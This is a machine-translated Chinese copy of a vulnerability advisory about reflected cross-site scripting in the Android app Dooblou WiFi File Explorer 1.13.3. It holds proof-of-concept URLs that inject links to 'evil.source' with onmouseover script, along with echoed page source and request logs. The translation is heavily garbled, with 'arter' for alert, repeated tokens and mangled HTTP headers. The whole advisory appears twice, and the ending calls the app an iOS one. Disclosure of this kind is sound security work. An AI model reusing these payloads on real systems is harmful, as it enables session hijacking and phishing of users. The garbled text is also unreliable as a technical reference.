#Exploit title: dooblou wifi文件资源管理器1.13.3-多个漏洞
参考(来源):
============================
发布日期:
=================
2023-07-04
脆弱性实验室ID(VL-ID):
==============================================
2317
常见的漏洞评分系统:
==============================================
5.1
漏洞class:
============================
多种的
当前的估计价格为:
================================
500€-1.000€
产品服务简介:
========================================
通过Wifi连接使用Web浏览器浏览,下载和流式的Android设备上的单个文件。
不再将手机拆开以取出SD卡或抓住电缆以访问相机图片并在您喜欢的MP3上复制。
(homepage:https://play.google.com/store/apps/details?id=com.dooblou.wififileexplorer的副本)
摘要咨询信息:
======================================
脆弱性实验室核心研究团队在官方的dooblou wifi文件资源管理器1.13.3移动android wifi Web应用程序中发现了多个Web漏洞。
受影响的产品:
============================
产品所有者: Dooblou
product: dooblou wifi文件资源管理器v1.13.3 - (android)(框架)(wifi)(Web -application)
漏洞披露时间表:
============================================
2022-01-193360研究人员通知协调(安全研究人员)
2022-01-203360供应商通知(安全部门)
2022 - ** - ** :供应商响应/反馈(安全部门)
2022 - ** - ** :供应商Fix/patch(服务开发人员团队)
2022 - ** - ** :安全性致谢(安全部门)
2023-07-04:公共披露(脆弱性实验室)
发现状态:
=====================
出版
剥削技术:
================================
偏僻的
严重性级别:
===================
中等的
身份验证类型:
============================
限制身份验证(客人特权)
用户交互:
=====================
用户互动低
披露类型:
=====================
独立安全研究
技术详细信息描述:
=====================================
在官方的Dooblou Wifi File Explorer 1.13.3移动Android Wifi Web应用程序中发现了多个输入验证Web漏洞。
该漏洞允许远程攻击者将自己的恶意脚本代码注入非势力攻击向量,以妥协浏览器到Web应用程序
申请端的请求。
这些漏洞位于``搜索'',`rord',
并执行恶意脚本代码。攻击向量是非持久性的,并且要注入。攻击者无需授权
执行攻击以执行恶意脚本代码。例如
WiFi Explorer的前后端。
成功剥削脆弱性会导致会议劫持,非持久的网络钓鱼攻击,非持久的外部重定向到恶意
来源和非持续性操纵受影响的应用程序模块。
概念证明(POC):
================================
输入验证Web漏洞可以由没有用户帐户且用户交互较低的远程攻击者利用。
为了进行安全演示或重现Web漏洞,请遵循以下提供的信息和步骤继续进行。
POC:剥削
http://localhost3:8000/storage/emulation/0/download/a href='3https://evil.source'onmouseover=arter(document.document.docorm.domain)brplease单击路径以返回索引/a
http://localhost3:8000/storage/emul...+HREF%3D%22HTTPS%3A%2F%2F%2F%2fevil.sour.sour CE%22+onmouseover%3DALERT%28Document.Domain%29%3E%3CBR%3CBR%3eplease+单击+路径+路径+返回+返回+索引%3C%2FA%3Ex=3Y=3
脆弱的来源:执行点
表宽度='100%'cellpacing='0'cellpadding='16'border='0'''''''''''''
style='Vertical-Align:Top;'table style='Background-color:#ffa81e;
background-image: url(/x99_dooblou_res/x99_dooblou_gradient.png);
背景repeat:重复X;背景位置:TOP;'宽度='700'
cellPacing='3'cellpadding='5'border='0'tbodytrtdcenterspan
class='doob_large_text'Error/span/center/td/tr/tbody/tablebrtabl
e style='背景-color:#b2b2b2;背景图像:
url(/x99_dooblou_res/x99_dooblou_gradient.png);背景repeat:重复X;背景位置:TOP;' width='700'cellpacing='3'cellpadding='5'border='0'
tbodytrtdspan class='doob_medium_text'cannot查找文件或
目录! /storage/emulation/0/download/a href='https://evil.source'onMouseover='alert(document.domain)'brplease'brplease单击用户路径以返回
index/a/span/td/tr/tbody/tablebspan class='doob_medium_text'span class='doob_link'nbsp; nbsp; a
href='/'nbsp;返回
filesnbsp;/a/span/spanbr/td/tr/tbody/tablebr
-
li/li/ul/span/span/td/tr/tbody/table/divdiv class='身体行scroll-x scroll-x scroll-x y'table width='100%'cellpacing='0'cellpadding='6'border='0'''''''''''''''''''''0
TD样式='Vertical-Align:Top;' width='100%'表格名称='MultiSelect'样式='Margin: 0px; padding: 0px;' action='/storage/emulation/0/download/'enctype='multipart/form-data'method='post'
输入type='隐藏'名称='filenames'value=''table width='100%'cellpacing='0'cellpadding='1'border='0'bgcolor='#000000
表宽度='100%'cellpacing='2'cellpadding='3'border='0'bgcolor='#ffffffff''#fffff''background-color:#ffa81e; background-image: url(/x99_dooblou_res/x99_dooblou_gradient.png);
背景repeat:重复X;背景位置:TOP;'高度='30'td colspan='5 notable width='100%'cellpacing='0'cellpadding='0'border='0'tbodyttd style='White-space:
nowrap;vertical-align:middle'span class='doob_small_text_bold'nbsp;/span/tdtd style='white-space: nowrap;vertical-align:middle's align='right'span class='doob_small_text_bold'
nbsp; nbsp; nbsp; nbsp; a href='?view=23mode=a href='https:=''''
img style='Vertical-align:Middle; border-style:无'src='/x99_dooblou_res_res/x99_dooblou_details.png'alt='img' title='详细信息'/anbsp; nbsp; nbsp; nbsp; nbsp; | nbsp; nbsp; nbsp; nbsp; nbsp; nbsp; nbsp; nbsp; nbsp; nbsp; nbsp; nbsp; nbsp; nbsp; nbsp; nbsp;
a href='?view=24mode=a href='https:=''evil.source'=''onmouseover='arter(document.domain)'brplease'brplease'brplease单击路径返回indexsearch=a'''''
img style='Vertical-align:Middle; border-style:无'src='/x99_dooblou_res_res/x99_dooblou_thumbnails.png'alt='img'img' title='缩略图'/anbsp; nbsp; nbsp; nbsp; | nbsp; nbsp; nbsp; nbsp; nbsp; nbsp; nbsp; nbsp; nbsp; nbsp; nbsp; nbsp; nbsp; nbsp; nbsp; nbsp; nbsp; nbsp; nbsp; nbsp; nbsp; nbsp;
a href='?view=38mode=a href='https:=''evil.source'=''onmouseover='arter(document.docorm.domain)'brplease'brplease'brplease off tock tock toce返回i
-
td style='White-Space: Nowrap; vertical-align:Middle'Input value=''type='checkbox'name='selectall'onclick='setCheckall();'nbsp; nbsp; nbsp; a class='doob_button'
href='javaScript:SetMultiselect('/storage/仿真/','',''18order='=''
style=''下载/anbsp; a class='doob_button'href='javascript3:SetMultiselectConfirm('您确定要删除吗?这不能被撤消!
'13Order='a href='https://evil.source'onmouseover=alert(document.domain)'); javascript:document.multiselect.submit();''' style=''delete/anbsp;
a class='doob_button'href='javascript:SetMultiselectPromptquery('创建复制',
'/storage/emulation/','/storage/emulation/','',''35Order='a href='3https://evil.source'onmouseover=arter=arter(document.domain)','name'';
style=''创建复制/anbsp; a class='doob_button'href='x99_dooblou_pro_version.html'style=''zip/anbsp; a class='doob_button'href='
td align='right'样式='白色space: nowrap; vertical-align:middle'span class='doob_small_text_bold'nbsp; nbsp; nbsp; nbsp; nbsp; a href; a href=' style='Vertical-align:Middle;边框式:
无'src='/x99_dooblou_res/x99_dooblou_tree_dark.png'alt='img'title='show treeview'/anbsp; nbsp; nbsp; nbsp; nbsp; | nbsp; nbsp; nbsp; nbsp; nbsp; nbsp; nbsp; nbsp; nbsp; nbsp; nbsp; nbsp; nbsp; nbsp; nbsp; nbsp; nbsp; nbsp; nbsp;
a href='?view=23Order='a href='3https://Evil.Source'onMouseOver=arter=arter(document.domain)'img style='vertical-align:middle; border-style:
title='详细信息'/anbsp; nbsp; nbsp; nbsp; | nbsp; nbsp; nbsp; nbsp; nbsp; nbsp; nbsp; a href='?view='a a href='a href='3https://evil.source'source'onMouseover=arter=arter(document.domain) style='Vertical-align:Middle;边框式:
无'src='/x99_dooblou_res/x99_dooblou_thumbnails.png'alt='img' title='缩略图'/anbsp; nbsp; nbsp; nbsp; nbsp; | nbsp; nbsp; nbsp; nbsp; nbsp; nbsp; nbsp; nbsp; nbsp; nbsp; nbsp; nbsp; nbsp; nbsp; nbsp; nbsp; nbsp; nbsp; nbsp; nbsp;
a href='?view=38Order='a href='https://evil.source'onMouseOver=arter=arter(document.domain)'img style='vertical-align:middle; border-style3: none'none'src='src='src=''/x99_dooblou_re_re_re_re_r=
title='缩略图'/anbsp; nbsp; nbsp; nbsp;/span/td/tr/table
--- POC会话日志---
http://localhost3:8000/storage/emulation/0/download/a href='3https://evil.source'onmouseover=arter(document.document.domain)brplease单击用户路径返回index/x99_dooblou_signal_signal_signal_signal_strength.xmentlength.xstrength.xcrength.xstrength.xstrength.xstrength.xstrength
HOST: LOCALHOST:8000
用户代理: Mozilla/5.0(Windows NT 10.0; Win64; X64; rv:102.0)gecko/20100101 Firefox/102.0
ACCEPT: /
Accept-Language: de,en-us; q=0.7,en; q=0.3
Accept-incoding: Gzip,放气
Connection:保持空白
Referer:http://localhost:8000/storage/emula...br>PLEASE CLICK USER PATH TO RETURN INDEX</a>
GET: HTTP/1.1 200好
CACHE-CONTROL:无缓存
content-type: text/xml
-
HOST: LOCALHOST:8000
用户代理: Mozilla/5.0(Windows NT 10.0; Win64; X64; rv:102.0)gecko/20100101 Firefox/102.0
ACCEPT:文本/HTML,Application/XHTML+XML,Application/XML; Q=0.9,Image/avif,Image/WebP,/; q=0.8
Accept-Language: de,en-us; q=0.7,en; q=0.3
Accept-incoding: Gzip,放气
Connection:保持空白
cookie: treeview=0
升级- 不肯定- requests: 1
GET: HTTP/1.1 200好
cache-control:无存储,无缓存,必须恢复活力
content-type:文本/html
-
http://localhost3:8000/storage/emulation/0/download/a href='3https://evil.source'onmouseover=arter(document.document.domain)brplease单击用户路径返回index/x99_dooblou_signal_signal_signal_signal_strength.xmentlength.xstrength.xcrength.xstrength.xstrength.xstrength.xstrength
HOST: LOCALHOST:8000
用户代理: Mozilla/5.0(Windows NT 10.0; Win64; X64; rv:102.0)gecko/20100101 Firefox/102.0
ACCEPT: /
Accept-Language: de,en-us; q=0.7,en; q=0.3
Accept-incoding: Gzip,放气
Connection:保持空白
Referer:http://localhost3:8000/storage/notale/0/download/download/%a href='https://evil.source'onmouseover=arterover=arter(document.domain.domain)%3E%3e%3CBR%3cbr%3eplease%3eplease%20click%20click%20click%20click;
GET: HTTP/1.1 200好
CACHE-CONTROL:无缓存
content-type: text/xml
安全风险:
===================
iOS移动WiFi Web应用程序中多个Web漏洞的安全风险估计为媒介。
参考(来源):
============================
正在加载...
www.vulnerability-lab.com
=================
2023-07-04
脆弱性实验室ID(VL-ID):
==============================================
2317
常见的漏洞评分系统:
==============================================
5.1
漏洞class:
============================
多种的
当前的估计价格为:
================================
500€-1.000€
产品服务简介:
========================================
通过Wifi连接使用Web浏览器浏览,下载和流式的Android设备上的单个文件。
不再将手机拆开以取出SD卡或抓住电缆以访问相机图片并在您喜欢的MP3上复制。
(homepage:https://play.google.com/store/apps/details?id=com.dooblou.wififileexplorer的副本)
摘要咨询信息:
======================================
脆弱性实验室核心研究团队在官方的dooblou wifi文件资源管理器1.13.3移动android wifi Web应用程序中发现了多个Web漏洞。
受影响的产品:
============================
产品所有者: Dooblou
product: dooblou wifi文件资源管理器v1.13.3 - (android)(框架)(wifi)(Web -application)
漏洞披露时间表:
============================================
2022-01-193360研究人员通知协调(安全研究人员)
2022-01-203360供应商通知(安全部门)
2022 - ** - ** :供应商响应/反馈(安全部门)
2022 - ** - ** :供应商Fix/patch(服务开发人员团队)
2022 - ** - ** :安全性致谢(安全部门)
2023-07-04:公共披露(脆弱性实验室)
发现状态:
=====================
出版
剥削技术:
================================
偏僻的
严重性级别:
===================
中等的
身份验证类型:
============================
限制身份验证(客人特权)
用户交互:
=====================
用户互动低
披露类型:
=====================
独立安全研究
技术详细信息描述:
=====================================
在官方的Dooblou Wifi File Explorer 1.13.3移动Android Wifi Web应用程序中发现了多个输入验证Web漏洞。
该漏洞允许远程攻击者将自己的恶意脚本代码注入非势力攻击向量,以妥协浏览器到Web应用程序
申请端的请求。
这些漏洞位于``搜索'',`rord',
dlownload',``'''''''''''''。通过获取方法请求请求的内容未经安全验证并执行恶意脚本代码。攻击向量是非持久性的,并且要注入。攻击者无需授权
执行攻击以执行恶意脚本代码。例如
WiFi Explorer的前后端。
成功剥削脆弱性会导致会议劫持,非持久的网络钓鱼攻击,非持久的外部重定向到恶意
来源和非持续性操纵受影响的应用程序模块。
概念证明(POC):
================================
输入验证Web漏洞可以由没有用户帐户且用户交互较低的远程攻击者利用。
为了进行安全演示或重现Web漏洞,请遵循以下提供的信息和步骤继续进行。
POC:剥削
http://localhost3:8000/storage/emulation/0/download/a href='3https://evil.source'onmouseover=arter(document.document.docorm.domain)brplease单击路径以返回索引/a
http://localhost3:8000/storage/emul...+HREF%3D%22HTTPS%3A%2F%2F%2F%2fevil.sour.sour CE%22+onmouseover%3DALERT%28Document.Domain%29%3E%3CBR%3CBR%3eplease+单击+路径+路径+返回+返回+索引%3C%2FA%3Ex=3Y=3
正在加载...
localhost
正在加载...
localhost
表宽度='100%'cellpacing='0'cellpadding='16'border='0'''''''''''''
style='Vertical-Align:Top;'table style='Background-color:#ffa81e;
background-image: url(/x99_dooblou_res/x99_dooblou_gradient.png);
背景repeat:重复X;背景位置:TOP;'宽度='700'
cellPacing='3'cellpadding='5'border='0'tbodytrtdcenterspan
class='doob_large_text'Error/span/center/td/tr/tbody/tablebrtabl
e style='背景-color:#b2b2b2;背景图像:
url(/x99_dooblou_res/x99_dooblou_gradient.png);背景repeat:重复X;背景位置:TOP;' width='700'cellpacing='3'cellpadding='5'border='0'
tbodytrtdspan class='doob_medium_text'cannot查找文件或
目录! /storage/emulation/0/download/a href='https://evil.source'onMouseover='alert(document.domain)'brplease'brplease单击用户路径以返回
index/a/span/td/tr/tbody/tablebspan class='doob_medium_text'span class='doob_link'nbsp; nbsp; a
href='/'nbsp;返回
filesnbsp;/a/span/spanbr/td/tr/tbody/tablebr
-
li/li/ul/span/span/td/tr/tbody/table/divdiv class='身体行scroll-x scroll-x scroll-x y'table width='100%'cellpacing='0'cellpadding='6'border='0'''''''''''''''''''''0
TD样式='Vertical-Align:Top;' width='100%'表格名称='MultiSelect'样式='Margin: 0px; padding: 0px;' action='/storage/emulation/0/download/'enctype='multipart/form-data'method='post'
输入type='隐藏'名称='filenames'value=''table width='100%'cellpacing='0'cellpadding='1'border='0'bgcolor='#000000
表宽度='100%'cellpacing='2'cellpadding='3'border='0'bgcolor='#ffffffff''#fffff''background-color:#ffa81e; background-image: url(/x99_dooblou_res/x99_dooblou_gradient.png);
背景repeat:重复X;背景位置:TOP;'高度='30'td colspan='5 notable width='100%'cellpacing='0'cellpadding='0'border='0'tbodyttd style='White-space:
nowrap;vertical-align:middle'span class='doob_small_text_bold'nbsp;/span/tdtd style='white-space: nowrap;vertical-align:middle's align='right'span class='doob_small_text_bold'
nbsp; nbsp; nbsp; nbsp; a href='?view=23mode=a href='https:=''''
img style='Vertical-align:Middle; border-style:无'src='/x99_dooblou_res_res/x99_dooblou_details.png'alt='img' title='详细信息'/anbsp; nbsp; nbsp; nbsp; nbsp; | nbsp; nbsp; nbsp; nbsp; nbsp; nbsp; nbsp; nbsp; nbsp; nbsp; nbsp; nbsp; nbsp; nbsp; nbsp; nbsp;
a href='?view=24mode=a href='https:=''evil.source'=''onmouseover='arter(document.domain)'brplease'brplease'brplease单击路径返回indexsearch=a'''''
img style='Vertical-align:Middle; border-style:无'src='/x99_dooblou_res_res/x99_dooblou_thumbnails.png'alt='img'img' title='缩略图'/anbsp; nbsp; nbsp; nbsp; | nbsp; nbsp; nbsp; nbsp; nbsp; nbsp; nbsp; nbsp; nbsp; nbsp; nbsp; nbsp; nbsp; nbsp; nbsp; nbsp; nbsp; nbsp; nbsp; nbsp; nbsp; nbsp;
a href='?view=38mode=a href='https:=''evil.source'=''onmouseover='arter(document.docorm.domain)'brplease'brplease'brplease off tock tock toce返回i
-
td style='White-Space: Nowrap; vertical-align:Middle'Input value=''type='checkbox'name='selectall'onclick='setCheckall();'nbsp; nbsp; nbsp; a class='doob_button'
href='javaScript:SetMultiselect('/storage/仿真/','',''18order='=''
style=''下载/anbsp; a class='doob_button'href='javascript3:SetMultiselectConfirm('您确定要删除吗?这不能被撤消!
'13Order='a href='https://evil.source'onmouseover=alert(document.domain)'); javascript:document.multiselect.submit();''' style=''delete/anbsp;
a class='doob_button'href='javascript:SetMultiselectPromptquery('创建复制',
'/storage/emulation/','/storage/emulation/','',''35Order='a href='3https://evil.source'onmouseover=arter=arter(document.domain)','name'';
style=''创建复制/anbsp; a class='doob_button'href='x99_dooblou_pro_version.html'style=''zip/anbsp; a class='doob_button'href='
td align='right'样式='白色space: nowrap; vertical-align:middle'span class='doob_small_text_bold'nbsp; nbsp; nbsp; nbsp; nbsp; a href; a href=' style='Vertical-align:Middle;边框式:
无'src='/x99_dooblou_res/x99_dooblou_tree_dark.png'alt='img'title='show treeview'/anbsp; nbsp; nbsp; nbsp; nbsp; | nbsp; nbsp; nbsp; nbsp; nbsp; nbsp; nbsp; nbsp; nbsp; nbsp; nbsp; nbsp; nbsp; nbsp; nbsp; nbsp; nbsp; nbsp; nbsp;
a href='?view=23Order='a href='3https://Evil.Source'onMouseOver=arter=arter(document.domain)'img style='vertical-align:middle; border-style:
title='详细信息'/anbsp; nbsp; nbsp; nbsp; | nbsp; nbsp; nbsp; nbsp; nbsp; nbsp; nbsp; a href='?view='a a href='a href='3https://evil.source'source'onMouseover=arter=arter(document.domain) style='Vertical-align:Middle;边框式:
无'src='/x99_dooblou_res/x99_dooblou_thumbnails.png'alt='img' title='缩略图'/anbsp; nbsp; nbsp; nbsp; nbsp; | nbsp; nbsp; nbsp; nbsp; nbsp; nbsp; nbsp; nbsp; nbsp; nbsp; nbsp; nbsp; nbsp; nbsp; nbsp; nbsp; nbsp; nbsp; nbsp; nbsp;
a href='?view=38Order='a href='https://evil.source'onMouseOver=arter=arter(document.domain)'img style='vertical-align:middle; border-style3: none'none'src='src='src=''/x99_dooblou_re_re_re_re_r=
title='缩略图'/anbsp; nbsp; nbsp; nbsp;/span/td/tr/table
--- POC会话日志---
http://localhost3:8000/storage/emulation/0/download/a href='3https://evil.source'onmouseover=arter(document.document.domain)brplease单击用户路径返回index/x99_dooblou_signal_signal_signal_signal_strength.xmentlength.xstrength.xcrength.xstrength.xstrength.xstrength.xstrength
HOST: LOCALHOST:8000
用户代理: Mozilla/5.0(Windows NT 10.0; Win64; X64; rv:102.0)gecko/20100101 Firefox/102.0
ACCEPT: /
Accept-Language: de,en-us; q=0.7,en; q=0.3
Accept-incoding: Gzip,放气
Connection:保持空白
Referer:http://localhost:8000/storage/emula...br>PLEASE CLICK USER PATH TO RETURN INDEX</a>
GET: HTTP/1.1 200好
CACHE-CONTROL:无缓存
content-type: text/xml
-
正在加载...
localhost3
用户代理: Mozilla/5.0(Windows NT 10.0; Win64; X64; rv:102.0)gecko/20100101 Firefox/102.0
ACCEPT:文本/HTML,Application/XHTML+XML,Application/XML; Q=0.9,Image/avif,Image/WebP,/; q=0.8
Accept-Language: de,en-us; q=0.7,en; q=0.3
Accept-incoding: Gzip,放气
Connection:保持空白
cookie: treeview=0
升级- 不肯定- requests: 1
GET: HTTP/1.1 200好
cache-control:无存储,无缓存,必须恢复活力
content-type:文本/html
-
http://localhost3:8000/storage/emulation/0/download/a href='3https://evil.source'onmouseover=arter(document.document.domain)brplease单击用户路径返回index/x99_dooblou_signal_signal_signal_signal_strength.xmentlength.xstrength.xcrength.xstrength.xstrength.xstrength.xstrength
HOST: LOCALHOST:8000
用户代理: Mozilla/5.0(Windows NT 10.0; Win64; X64; rv:102.0)gecko/20100101 Firefox/102.0
ACCEPT: /
Accept-Language: de,en-us; q=0.7,en; q=0.3
Accept-incoding: Gzip,放气
Connection:保持空白
Referer:http://localhost3:8000/storage/notale/0/download/download/%a href='https://evil.source'onmouseover=arterover=arter(document.domain.domain)%3E%3e%3CBR%3cbr%3eplease%3eplease%20click%20click%20click%20click;
GET: HTTP/1.1 200好
CACHE-CONTROL:无缓存
content-type: text/xml
安全风险:
===================
iOS移动WiFi Web应用程序中多个Web漏洞的安全风险估计为媒介。